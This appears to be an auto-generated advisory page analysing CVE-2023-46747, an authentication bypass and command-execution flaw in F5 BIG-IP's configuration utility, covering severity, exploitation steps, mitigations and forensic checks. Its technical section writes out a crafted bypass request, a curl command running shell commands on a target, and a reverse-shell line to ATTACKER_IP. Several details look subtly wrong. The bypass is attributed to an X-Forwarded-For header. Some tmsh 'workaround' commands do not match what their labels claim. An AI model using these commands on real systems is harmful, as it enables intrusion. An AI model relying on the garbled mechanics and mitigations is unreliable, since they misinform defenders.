Description
Undisclosed requests may bypass configuration utility authentication, allowing an attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated
EPSS Score:
94%
Comprehensive Technical Analysis of EUVD-2023-50916 (CVE-2023-46747)
F5 BIG-IP Authentication Bypass & Remote Command Execution Vulnerability
1. Vulnerability Assessment & Severity Evaluation
Overview
EUVD-2023-50916 (CVE-2023-46747) is a critical authentication bypass vulnerability in F5 BIG-IP’s Configuration Utility (TMUI), allowing unauthenticated attackers with network access to execute arbitrary system commands. The vulnerability stems from improper handling of AJP (Apache JServ Protocol) smuggling, enabling attackers to bypass authentication and gain full control over affected systems.
CVSS v3.1 Metrics & Severity
| Metric | Value | Explanation |
|---|---|---|
| Base Score | 9.8 (Critical) | High impact on confidentiality, integrity, and availability. |
| Attack Vector (AV) | Network (N) | Exploitable remotely without physical/logical access. |
| Attack Complexity (AC) | Low (L) | No specialized conditions required; straightforward exploitation. |
| Privileges Required (PR) | None (N) | No prior authentication needed. |
| User Interaction (UI) | None (N) | Exploitation does not require user action. |
| Scope (S) | Unchanged (U) | Impact is confined to the vulnerable component. |
| Confidentiality (C) | High (H) | Full system compromise possible. |
| Integrity (I) | High (H) | Arbitrary command execution allows data manipulation. |
| Availability (A) | High (H) | Attackers can disrupt services or take systems offline. |
EPSS & Exploitability
- EPSS Score: 94% (Extremely high likelihood of exploitation in the wild)
- Exploit Code Maturity: Functional (Public PoC available; active exploitation observed)
- Threat Intelligence: Confirmed in-the-wild exploitation (e.g., ransomware campaigns, APT activity)
2. Potential Attack Vectors & Exploitation Methods
Root Cause Analysis
The vulnerability arises from improper AJP request handling in F5 BIG-IP’s Traffic Management User Interface (TMUI). Attackers can smuggle malicious AJP requests to bypass authentication and execute commands via:
- AJP Smuggling: Manipulating AJP headers to trick the server into processing unauthorized requests.
- Authentication Bypass: Crafting requests that appear to originate from a trusted source (e.g., localhost).
- Command Injection: Leveraging the bypass to execute arbitrary shell commands with root privileges.
Exploitation Workflow
-
Reconnaissance:
- Attacker identifies exposed BIG-IP management interfaces (default port 443/TCP or 8443/TCP).
- Uses tools like Shodan, Censys, or Nmap to discover vulnerable instances.
-
AJP Request Crafting:
- Attacker sends a malformed AJP request with manipulated headers (e.g.,
X-Forwarded-For: 127.0.0.1). - The request is processed as if it originated from the local system, bypassing authentication.
- Attacker sends a malformed AJP request with manipulated headers (e.g.,
-
Authentication Bypass & RCE:
- The attacker gains access to the TMUI admin panel without credentials.
- Exploits command injection (e.g., via
/mgmt/tm/util/bash) to execute arbitrary commands.
-
Post-Exploitation:
- Lateral Movement: Compromises internal networks via BIG-IP’s trusted position.
- Persistence: Installs backdoors, modifies configurations, or deploys malware.
- Data Exfiltration: Steals sensitive data (e.g., SSL certificates, credentials).
Publicly Available Exploits
- PacketStorm PoC (Link) – Proof-of-concept for RCE.
- Metasploit Module – Available in the exploit/linux/http/f5_bigip_tmui_rce module.
- Active Exploitation – Observed in ransomware attacks (e.g., LockBit, BlackCat) and APT campaigns.
3. Affected Systems & Software Versions
Vulnerable F5 BIG-IP Versions
| Major Version | Affected Versions | Fixed Versions |
|---|---|---|
| 17.x | 17.1.0 | 17.1.0.3+ |
| 16.x | 16.1.0 – 16.1.4 | 16.1.4.1+ |
| 15.x | 15.1.0 – 15.1.10 | 15.1.10.2+ |
| 14.x | 14.1.0 – 14.1.5 | 14.1.5.6+ |
| 13.x | 13.1.0 – 13.1.5 | No fix (EoTS) |
Out-of-Scope (Not Evaluated)
- End-of-Technical-Support (EoTS) versions (e.g., 12.x, 11.x) are not patched and remain vulnerable.
- BIG-IQ, NGINX, and other F5 products are not affected.
4. Recommended Mitigation Strategies
Immediate Actions (For Unpatched Systems)
-
Apply Security Patches:
- Upgrade to the latest fixed version (see table above).
- F5’s official advisory: K000137353.
-
Workarounds (If Patching is Delayed):
- Block AJP Traffic:
tmsh modify sys httpd allow none tmsh modify sys httpd include 'Include /etc/httpd/conf.d/ajp.conf' tmsh save sys config - Restrict Management Access:
- Limit management port (443/8443) to trusted IPs via firewall rules.
- Disable self-IP access to the TMUI.
- Disable TMUI (Temporary Measure):
tmsh modify sys httpd auth-pam-validate-ip off tmsh save sys config
- Block AJP Traffic:
-
Network-Level Protections:
- Deploy WAF Rules (e.g., ModSecurity, F5 ASM) to block AJP smuggling attempts.
- Segment BIG-IP Management Interfaces from untrusted networks.
-
Monitoring & Detection:
- SIEM Alerts: Monitor for unusual AJP traffic or authentication bypass attempts.
- Endpoint Detection (EDR/XDR): Detect post-exploitation activity (e.g., reverse shells, credential dumping).
- F5 BIG-IP Logs: Check for unauthorized access in
/var/log/httpd/error_log.
Long-Term Hardening
- Disable Unused Services: Turn off AJP, SSH, and SNMP if not required.
- Enable Multi-Factor Authentication (MFA) for TMUI access.
- Regular Vulnerability Scanning: Use Nessus, Qualys, or OpenVAS to detect unpatched systems.
- Zero Trust Architecture: Implement micro-segmentation to limit lateral movement.
5. Impact on the European Cybersecurity Landscape
Threat Landscape in Europe
-
Critical Infrastructure at Risk:
- BIG-IP is widely used in European financial institutions, government agencies, and healthcare providers.
- Successful exploitation could lead to large-scale data breaches (GDPR violations) or service disruptions.
-
Active Exploitation in the Wild:
- ENISA Threat Landscape Report (2024) highlights F5 BIG-IP vulnerabilities as a top attack vector.
- CERT-EU has issued multiple alerts regarding CVE-2023-46747 exploitation in ransomware campaigns.
-
Supply Chain Risks:
- Many European MSPs and cloud providers use BIG-IP for load balancing, making them high-value targets.
- Compromise of a single BIG-IP instance could cascade across multiple organizations.
Regulatory & Compliance Implications
- GDPR (Article 32): Failure to patch may result in fines up to €20M or 4% of global revenue.
- NIS2 Directive: Critical infrastructure operators must report incidents within 24 hours.
- DORA (Digital Operational Resilience Act): Financial entities must ensure third-party risk management (e.g., F5 vendors).
6. Technical Details for Security Professionals
Exploitation Deep Dive
AJP Smuggling Technique
- AJP Protocol Weakness: BIG-IP’s AJP implementation does not properly validate forwarded headers, allowing attackers to spoof requests.
- Request Crafting Example:
POST /tmui/login.jsp HTTP/1.1 Host: vulnerable-bigip.example.com X-Forwarded-For: 127.0.0.1 Content-Type: application/x-www-form-urlencoded Content-Length: 0 AJP/1.3 - Bypass Mechanism: The server processes the request as if it came from localhost, granting access without authentication.
Post-Exploitation Command Execution
- Exploit Chain:
- Bypass Authentication → Access
/mgmt/tm/util/bash. - Execute Commands:
curl -k -X POST "https://<TARGET>/mgmt/tm/util/bash" \ -H "Authorization: Basic YWRtaW46" \ -H "X-F5-Auth-Token: " \ -H "Content-Type: application/json" \ -d '{"command":"run","utilCmdArgs":"-c \'id\'"}' - Reverse Shell Example:
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
- Bypass Authentication → Access
Detection & Forensics
Indicators of Compromise (IoCs)
| IoC Type | Example |
|---|---|
| Network | Unusual AJP traffic on port 8009/TCP |
| Logs | /var/log/httpd/error_log showing authentication bypass attempts |
| Processes | Suspicious bash or python processes spawned by httpd |
| Files | Unauthorized modifications to /config/bigip.conf or /etc/passwd |
Forensic Analysis Steps
- Check for Exploitation Attempts:
grep -i "AJP" /var/log/httpd/error_log grep -i "X-Forwarded-For: 127.0.0.1" /var/log/httpd/access_log - Review User Accounts:
cat /etc/passwd | grep -v "root\|admin" - Check for Persistence:
ls -la /etc/cron.d/ find / -name "*.sh" -perm -111 2>/dev/null
Conclusion & Recommendations
Key Takeaways
- CVE-2023-46747 is a critical, actively exploited vulnerability with high impact on confidentiality, integrity, and availability.
- Exploitation is trivial (public PoCs available) and requires no authentication.
- European organizations are at high risk due to widespread BIG-IP usage in critical sectors.
Action Plan for Security Teams
- Patch Immediately: Apply F5’s fixes without delay.
- Isolate Management Interfaces: Restrict access to trusted IPs only.
- Monitor for Exploitation: Deploy SIEM alerts for AJP smuggling attempts.
- Conduct Forensic Analysis: Check for signs of compromise in logs.
- Review Compliance: Ensure alignment with GDPR, NIS2, and DORA.
Final Risk Assessment
| Factor | Risk Level | Justification |
|---|---|---|
| Exploitability | Critical | Public PoCs, low complexity |
| Impact | Critical | Full system compromise |
| Likelihood | High | Active exploitation observed |
| Mitigation Feasibility | High | Patches and workarounds available |
Recommendation: Treat this as a Tier-0 vulnerability and prioritize remediation within 24-48 hours to prevent catastrophic breaches.
References:
References
Affected Products
BIG-IP
Version: 15.1.0 <*
BIG-IP
Version: 16.1.0 <*
BIG-IP
Version: 14.1.0 <*
BIG-IP
Version: 17.1.0 <*
BIG-IP
Version: 13.1.0 <*
Vendors
F5